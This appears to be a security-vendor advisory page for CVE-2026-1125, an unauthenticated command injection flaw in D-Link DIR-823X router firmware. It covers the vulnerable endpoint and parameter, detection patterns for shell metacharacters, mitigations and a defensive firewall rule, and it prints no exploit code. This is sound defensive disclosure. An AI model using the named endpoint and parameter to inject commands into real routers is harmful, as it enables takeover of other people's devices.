Skip to main content
A Leader in the 2026 Gartner® Magic Quadrant™ for Endpoint Protection. Six years running.Find Out Why
CVE Vulnerability Database
Vulnerability Database/CVE-2026-1125

CVE-2026-1125: D-Link DIR-823X Firmware RCE Vulnerability

CVE-2026-1125 is a command injection flaw in D-Link DIR-823X firmware that enables remote code execution. Attackers can exploit the wd_enable parameter to gain unauthorized control. This article covers technical details.

Updated:

CVE-2026-1125 Overview

CVE-2026-1125 is a command injection vulnerability in the D-Link DIR-823X router running firmware build 250416. The flaw resides in the sub_412E7C function handling requests to /goform/set_wifidog_settings. An attacker can manipulate the wd_enable argument to inject operating system commands. The vulnerability is exploitable remotely without authentication and a public exploit has been published.

Critical Impact

Remote attackers can execute arbitrary operating system commands on affected D-Link DIR-823X routers by sending a crafted request to the WiFiDog settings endpoint, potentially yielding full control of the device.

Affected Products

  • D-Link DIR-823X router hardware
  • D-Link DIR-823X firmware build 250416
  • D-Link DIR-823X firmware build 250126

Discovery Timeline

  • 2026-01-18 - CVE-2026-1125 published to the National Vulnerability Database
  • 2026-04-29 - Last updated in NVD database

Technical Details for CVE-2026-1125

Vulnerability Analysis

The vulnerability resides in the sub_412E7C function within the router's web management interface, specifically handling the /goform/set_wifidog_settings endpoint. This endpoint configures the WiFiDog captive portal service on the device. The wd_enable parameter supplied through the HTTP request is passed to a shell-executing function without sufficient sanitization. An attacker who can reach the router's web interface can append shell metacharacters to inject arbitrary commands. The flaw is categorized under [CWE-77] Command Injection and [CWE-74] Improper Neutralization of Special Elements in Output Used by a Downstream Component.

Root Cause

The root cause is improper neutralization of user-controlled input before it is concatenated into a shell command invocation. The sub_412E7C handler does not validate or escape the wd_enable parameter. Shell metacharacters such as semicolons, backticks, and pipes pass through unchanged to the underlying system call.

Attack Vector

The attack vector is network-based and requires no authentication or user interaction. An attacker sends an HTTP POST request to /goform/set_wifidog_settings with a malicious wd_enable value containing shell command separators. Injected commands execute with the privileges of the web server process, typically root on consumer router firmware. Public proof-of-concept code documenting the request structure has been released on GitHub.

No verified exploit code is reproduced here. See the GitHub CVE Command Execution Exploit for technical proof-of-concept details.

Detection Methods for CVE-2026-1125

Indicators of Compromise

  • HTTP POST requests to /goform/set_wifidog_settings containing shell metacharacters (;, |, `, $()) in the wd_enable parameter
  • Unexpected outbound connections originating from the router management plane
  • Modified or newly created files in router persistent storage following WiFiDog configuration changes
  • Unusual processes spawned by the router's httpd or goahead web service

Detection Strategies

  • Inspect web server access logs on the router for requests targeting /goform/set_wifidog_settings with non-standard parameter values
  • Deploy network intrusion detection signatures matching command injection patterns in HTTP request bodies destined for D-Link administrative interfaces
  • Monitor for HTTP requests to goform endpoints originating from untrusted network segments or the WAN interface

Monitoring Recommendations

  • Capture and review router syslog output centrally for anomalous configuration changes to WiFiDog settings
  • Alert on any outbound DNS or TCP connections initiated by the router to non-vendor infrastructure
  • Track firmware integrity via periodic comparison of running configuration against known-good baselines

How to Mitigate CVE-2026-1125

Immediate Actions Required

  • Disable remote (WAN-side) administration on affected DIR-823X devices and restrict the web interface to trusted LAN hosts only
  • Block external access to /goform/set_wifidog_settings at any upstream firewall or gateway
  • Audit the router for unauthorized configuration changes, persistent backdoors, and modified startup scripts
  • Rotate any credentials previously entered into the device, as they may have been exposed

Patch Information

As of the last NVD update, no official patched firmware release from D-Link has been linked to CVE-2026-1125 in the published advisory references. Administrators should monitor the D-Link Official Website for security firmware updates addressing the DIR-823X command injection. Coordination details and submission tracking are available via VulDB CTI ID #341717.

Workarounds

  • Place the DIR-823X behind a network segment that restricts access to its management interface using strict ACLs
  • Disable the WiFiDog captive portal feature if it is not required in the deployment
  • Replace the affected device with a supported model if vendor patches are not released in a timely manner
bash
# Example firewall rule blocking external access to vulnerable endpoint
iptables -I INPUT -i wan0 -p tcp --dport 80 -m string \
  --string "/goform/set_wifidog_settings" --algo bm -j DROP
iptables -I INPUT -i wan0 -p tcp --dport 443 -j DROP

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the Most Advanced Cybersecurity Platform

See how the world’s most intelligent, autonomous cybersecurity platform can protect your organization today and into the future.

Try SentinelOne